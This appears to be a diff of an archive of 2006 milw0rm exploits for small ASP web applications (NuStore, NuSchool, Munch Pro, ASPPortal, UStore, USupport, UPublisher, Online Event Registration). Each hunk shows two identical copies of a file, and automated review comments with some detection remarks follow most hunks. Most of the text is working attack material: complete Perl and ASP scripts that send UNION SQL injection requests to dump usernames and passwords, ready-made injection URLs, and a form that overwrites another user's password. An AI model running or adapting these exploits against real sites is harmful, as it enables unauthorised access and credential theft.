print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /Location:(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /Address:(.*?)<\/font>/){
print "+ Password: $1\n";
}
if ($answer =~ /# Rooms:(.*?)<\/font>/){
print "+ Email: $1\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11]
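Review bot: the three extraction regexes key on the property-page labels `Location:`, `Address:` and `# Rooms:` but print their captures as Username, Password and Email; the mapping only holds because the UNION in `$target` places `Username,password,Email` in the second to fourth positions of the row that `propertysdetails.asp` renders under those labels, and nothing in the file says so. A comment above `$target` explaining the column-to-label mapping would stop the next maintainer from reading the `Location:` / `Address:` matches as a bug. Note also that `$target` starts with the fixed id `16` rather than a non-existent id, so the page's genuine property row is rendered too and the first `Location:` match may belong to it rather than to the injected row.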


@ -1,20 +1,20 @@
*******************************************************************************
# Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ]
Example:
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-11]
*******************************************************************************
# Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ]
Example:
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-11]
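Review bot: `SubCatagoryID` (sic) appears in the template line and in both examples; if that is the application's actual parameter spelling rather than a transcription error, the file should say so, because a reader who "corrects" it to `SubCategoryID` will conclude the PoC is wrong. Secondary: the two example lines differ only in the table name (`customers` vs `customeremail`) and both end in `where no=0`, with no explanation of what `no` is or why `0`; one explanatory line would help.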


@ -1,69 +1,69 @@
#!/usr/bin/perl
#[Script Name: NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "CampusNewsDetails.asp?NewsID=";
$target = "-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /<td width=\"21%\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /<td colspan=\"2\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
print "+ Password: $1\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11]
#!/usr/bin/perl
#[Script Name: NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "CampusNewsDetails.asp?NewsID=";
$target = "-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /<td width=\"21%\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /<td colspan=\"2\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
print "+ Password: $1\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11]
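Review bot: the payload in `$target` begins `select%2000,UserName,Password,0`, so the first projected column is the literal `00`; that is almost certainly a typo for `0` (every other script in this batch uses a single `0` as filler) and should be cleaned up so it does not look like a deliberate choice. The two extraction regexes are tied to exact `<td width="21%">` and `<td colspan="2">` markup, so any template change breaks the parse silently; a comment stating that assumption would help whoever next touches the file.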


@ -1,69 +1,69 @@
#!/usr/bin/perl
#[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "switch.asp?pg=subMenu&catid=";
$target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){
print "+ Password: $1\n";
exit();
}
if ($answer =~ /Under Construction, Please check back soon.../) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-12]
#!/usr/bin/perl
#[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "switch.asp?pg=subMenu&catid=";
$target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){
print "+ Password: $1\n";
exit();
}
if ($answer =~ /Under Construction, Please check back soon.../) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-12]
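Review bot: the two copies of this file in the hunk are textually identical from the `#!/usr/bin/perl` header to the `# milw0rm.com [2006-11-12]` trailer, so the change is presumably whitespace or line-ending only and the archived script's behaviour is unchanged. For anyone indexing the archive defensively, the marker is the `catid` value built on the `$target =` line, `-1 union select 0,0,username,0,password,0 from users where id like ...`, sent as a plain GET to `switch.asp?pg=subMenu`, which is easy to match in web-server access logs. The root cause is `catid` reaching the query unparameterized, and the success regexes (`<strong>(.*?)</strong>` inside a fixed table layout) show that the page echoes the selected column values straight into the HTML, which is why a read-only UNION is enough to disclose credentials.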

View file

@ -1,192 +1,192 @@
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit1.asp
'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
'===============================================================================================
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
%>
<html>
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal &lt;=</b>v4.0.0(default1.asp) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>
<%
If islem = "get" Then
string1="default1.asp"
string2="default1.asp"
cek= Request.Form("id")
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string1
target2 = targettext+string2
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "POST" , come, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take = .Responsetext
End With
SET objtake = Nothing
End Function
Public Function take1(come1)
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake1
.Open "POST" , come1, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take1 = .Responsetext
End With
SET objtake1 = Nothing
End Function
get_username = take(target1)
get_password = take1(target2)
getdata=InStr(get_username,"Poll Question:</b>&nbsp;" )
username=Mid(get_username,getdata+24,14)
passwd=Mid(get_password,getdata+24,14)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr>
</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-11-12]
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit1.asp
'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
'===============================================================================================
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
%>
<html>
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal &lt;=</b>v4.0.0(default1.asp) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>
<%
If islem = "get" Then
string1="default1.asp"
string2="default1.asp"
cek= Request.Form("id")
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string1
target2 = targettext+string2
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "POST" , come, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take = .Responsetext
End With
SET objtake = Nothing
End Function
Public Function take1(come1)
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake1
.Open "POST" , come1, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take1 = .Responsetext
End With
SET objtake1 = Nothing
End Function
get_username = take(target1)
get_password = take1(target2)
getdata=InStr(get_username,"Poll Question:</b>&nbsp;" )
username=Mid(get_username,getdata+24,14)
passwd=Mid(get_password,getdata+24,14)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr>
</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-11-12]
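Review bot: `Set objtake = Nothing` in the final `<% ... %>` block (just before the `# milw0rm.com` trailer) is dead code: `objtake` is local to `Public Function take(come)` and is already released there with `SET objtake = Nothing`, so the outer statement refers to a variable that was never set at page scope. `On Error Resume Next` at the top means the page has no server-side failure path at all, which is why success is inferred client-side by the `functionControl2` and `writetext` timers testing whether hidden `field1` is empty. Two defensive points follow directly from the hunk: the injection point in ASPPortal is the `Poll_ID` form field of `default1.asp` (`.send "Voteit=1&Poll_ID=-1%20union%20select..."`), a POST body that URL-only logging will not capture; and because this page accepts any `text1` URL and issues server-side `Microsoft.XMLHTTP` POSTs to it, hosting it anywhere turns that host into an open request relay. The `'[Using : Tr:` comment lines are Turkish and untranslated; they say, roughly, to decode the retrieved password with the Perl script, that the Turkish-language edition of the product does not return the data this way, and that the author does not expect anyone to misuse it.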

View file

@ -1,19 +1,19 @@
*******************************************************************************
# Title : UStore 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Vendor: http://www.superfreaker.com/
*******************************************************************************
###http://[target]/[path]//detail.asp?ID=[SQL]
Example:
//detail.asp?ID=-1%20union%20select%200,username,password,0,0,0,0,0,0,0%20from%20tblusers%20where%20id%20like%201
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]
*******************************************************************************
# Title : UStore 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Vendor: http://www.superfreaker.com/
*******************************************************************************
###http://[target]/[path]//detail.asp?ID=[SQL]
Example:
//detail.asp?ID=-1%20union%20select%200,username,password,0,0,0,0,0,0,0%20from%20tblusers%20where%20id%20like%201
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]
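Review bot: the example URL `//detail.asp?ID=-1%20union%20select%200,username,password,0,0,0,0,0,0,0%20from%20tblusers%20where%20id%20like%201` documents both the injection point (`ID` in `detail.asp`) and the column count (10) of the UNION, which is what makes this entry usable as a WAF/IDS test case: an integer-typed `ID` that accepts `-1 union select` means there is neither a type check nor parameterization. The header block has no date besides the `# milw0rm.com [2006-11-12]` trailer, and the path template `http://[target]/[path]//detail.asp` carries a doubled slash that is an artifact of the template rather than part of the request.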

View file

@ -1,22 +1,22 @@
*******************************************************************************
# Title : USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Vendor: http://www.superfreaker.com/
# Dork : UPublisher
*******************************************************************************
###http://[target]/[path]//detail.asp?id=[SQL]
Example:
//detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]
*******************************************************************************
# Title : USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Vendor: http://www.superfreaker.com/
# Dork : UPublisher
*******************************************************************************
###http://[target]/[path]//detail.asp?id=[SQL]
Example:
//detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]
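Review bot: `# Dork : UPublisher` contradicts the title `USupport 1.0 (detail.asp)`; it looks copied from the UPublisher entry in this same commit and should name USupport (or be dropped) so the search term matches the product. The payload also differs from the UStore entry in a way worth recording: `id=11 union select ...` appends to a valid record id rather than using `-1`, so a detection rule keyed only on a negative id would miss it; key on `union select` in the `id` parameter of `detail.asp` instead.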

View file

@ -1,25 +1,25 @@
*******************************************************************************
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
Vulnerability
# Author : ajann
# Dork : UPublisher
# Vendor: http://www.superfreaker.com/
*******************************************************************************
###http://[target]/[path]//viewarticle.asp?ID=[SQL]
Example:
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR ---
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]
*******************************************************************************
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
Vulnerability
# Author : ajann
# Dork : UPublisher
# Vendor: http://www.superfreaker.com/
*******************************************************************************
###http://[target]/[path]//viewarticle.asp?ID=[SQL]
Example:
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR ---
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]
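Review bot: the `# Title :` line is wrapped, with `Vulnerability` falling onto its own line (`# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection` / `Vulnerability`), which breaks tools that parse the header line by line; every other advisory in this commit keeps the title on one line. The two alternative payloads (`select 0,password,username,0,0,0,0` with 7 columns and `select 0,0,username,password,0,0,0,0,0` with 9) indicate the `viewarticle.asp` query has differed between builds, so a vendor fix should be verified against both rather than assuming one column layout.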

View file

@ -1,36 +1,36 @@
<!--
# Title : Online Event Registration <= v2.0 (save_profile.asp) Remote User Pass Change Exploit
# Author : ajann
[Code]]]
-->
<html>
<body bgcolor="#000000">
<form method="POST" action="save_profile.asp?key=1&regkey=">
User Name<input type="hidden" name="UserID" size="4">
<input type="text" name="UserName" size="20" class="TBox" value="Demo Account" maxlength="40">
<input type="text" name="Company" size="40" class="TBox" value="Demo Account">
Email<input type="text" name="EmailAddress" size="40" class="TBox" value="demo@codewidgets.net" maxlength="40">
Phone<input type="text" name="Phone" size="20" class="TBox" value="780-429-2318" maxlength="14">
Fax<input type="text" name="Fax" size="20" class="TBox" value="780-429-2319">
Password<input name="Password" size="20" class="TBox" value="demo" maxlength="10">
<input type="submit" value="Submit" name="B1" class="PButton">
</form>
</body>
</html>
<!--
[/Code]]]
Change: <input type="hidden" name="UserID" size="4"> => ID
Next Click "Profile"
#ajann,Turkey
#...
#Im Not Hacker!
-->
# milw0rm.com [2006-11-13]
<!--
# Title : Online Event Registration <= v2.0 (save_profile.asp) Remote User Pass Change Exploit
# Author : ajann
[Code]]]
-->
<html>
<body bgcolor="#000000">
<form method="POST" action="save_profile.asp?key=1&regkey=">
User Name<input type="hidden" name="UserID" size="4">
<input type="text" name="UserName" size="20" class="TBox" value="Demo Account" maxlength="40">
<input type="text" name="Company" size="40" class="TBox" value="Demo Account">
Email<input type="text" name="EmailAddress" size="40" class="TBox" value="demo@codewidgets.net" maxlength="40">
Phone<input type="text" name="Phone" size="20" class="TBox" value="780-429-2318" maxlength="14">
Fax<input type="text" name="Fax" size="20" class="TBox" value="780-429-2319">
Password<input name="Password" size="20" class="TBox" value="demo" maxlength="10">
<input type="submit" value="Submit" name="B1" class="PButton">
</form>
</body>
</html>
<!--
[/Code]]]
Change: <input type="hidden" name="UserID" size="4"> => ID
Next Click "Profile"
#ajann,Turkey
#...
#Im Not Hacker!
-->
# milw0rm.com [2006-11-13]
